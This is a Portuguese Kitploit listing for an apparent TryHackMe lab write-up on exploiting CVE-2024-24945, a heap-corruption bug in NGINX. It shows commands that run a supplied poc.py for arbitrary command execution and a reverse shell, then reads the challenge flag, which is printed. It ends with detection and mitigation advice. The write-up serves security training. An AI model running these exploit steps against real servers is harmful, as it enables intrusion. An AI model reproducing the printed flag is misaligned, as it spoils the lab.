Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough — Este laboratório demonstra a exploração do CVE-2024-24945, uma vulnerabilidade de corrupção de heap que afeta o NGINX. O objetivo era compreender como a corrupção de memória pode levar à Execução Remota de Código (RCE) e obter experiência prática em técnicas de exploração, detecção e mitigação. | Kitploit
Ferramentas/GitHubGitHub/benedictejepu/cve-2024-24945-nginx-rift---tryhackme-lab-walkthrough
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e EducaçãoExploração de BináriosLabs e Prática

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

GitHub
benedictejepu/cve-2024-24945-nginx-rift---tryhackme-lab-walkthrough

CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough

Ver Repositório
há 2 mesesAinda não revisado

Este laboratório demonstra a exploração do CVE-2024-24945, uma vulnerabilidade de corrupção de heap que afeta o NGINX. O objetivo era compreender como a corrupção de memória pode levar à Execução Remota de Código (RCE) e obter experiência prática em técnicas de exploração, detecção e mitigação.

Compartilhar

CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough

Este laboratório demonstra a exploração da CVE-2024-24945, uma vulnerabilidade de corrupção de heap que afeta o NGINX. O objetivo era entender como a corrupção de memória pode levar à Execução Remota de Código (RCE) e adquirir experiência prática em técnicas de exploração, detecção e mitigação.

Objectives

. Verificar o serviço NGINX vulnerável. . Executar comandos arbitrários usando o proof of concept (PoC) fornecido. . Obter um reverse shell no contêiner alvo. . Recuperar a flag do desafio. . Entender estratégias de detecção e mitigação.

Lab Environment

. Platform: TryHackMe . Target Service: NGINX RIFT . Containerized Environment: Docker . Exploit Tool: poc.py . Access Method: VNC (Virtual Network Computing)

Methodology

  1. Service Verification

  2. confirmado que o contêiner vulnerável estava em execução e acessível.

  3. root@kitploit:~
    sudo docker ps
    curl -s http://127.0.0.1:19321/api/users/42
    

backend ok

  1. Remote Code Execution

Executou o PoC fornecido para validar a execução de comandos arbitrários.

root@kitploit:~
pytho3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned

Verificado execução bem-sucedida:

root@kitploit:~
sudo docker exec nginx-rift-nginx-1
cat /tmp/pwned

Output: hello from depthfirst

Reverse Shell Access

Estabelecer um shell interativo no contêiner alvo.

root@kitploit:~
python3 poc.py --shell

Successful Connection:

[] listening for reverse shell on port 1337... [] connected. $

  1. Flag Retrieval

Acessou a flag do desafio.

root@kitploit:~
cat /flag.txt

Flag:

THM{18_y34r_%t4t3_m15m4tch_rip5_th3_h34p}

Detection Opportunities

Defensores podem identificar tentativas de exploração através de:

. Quebras do worker do NGINX . Eventos de falha de segmentação . Conexões de rede de saída inesperadas . Processos shell suspeitos (/bin/sh, bash) . Criação não autorizada de arquivos em diretórios temporários

Mitigation Strategies

. Atualizar para uma versão corrigida do NGINX. . Aplicar o princípio do menor privilégio. . Restringir tráfego de rede de saída desnecessário Implementar monitoramento contínuo de logs. . Usar controles de segurança de contêineres e monitoramento de tempo de execução

Key Takeaways

Este laboratório proporcionou experiência prática em:

. Entender vulnerabilidades de corrupção de heap. . Explorar falhas de Execução Remota de Código. . Estabelecer reverse shells. . Realizar validação pós-exploração. . Reconhecer indicadores de comprometimento e técnicas de mitigação.

Disclaimer

Este exercício foi realizado em um ambiente de laboratório TryHackMe controlado, apenas para fins educacionais e de treinamento em cibersegurança defensiva.

Author: [Benedict Ejepu Amaechi] Platform: TryHackMe Topic: CVE-2024-24945 9NGINX RIFT0 Exploitation and Defence Date Completed: Junho de 2026

Baixar ferramenta